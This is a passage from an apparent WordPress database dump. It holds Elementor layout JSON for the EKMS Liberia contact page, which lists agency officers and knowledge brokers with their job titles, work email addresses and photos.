size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23438,3408,'_elementor_edit_mode','builder'),(23439,3408,'_elementor_template_type','wp-page'),(23440,3408,'_elementor_version','3.0.16'),(23441,3408,'_wp_page_template','default'),(23442,3408,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a 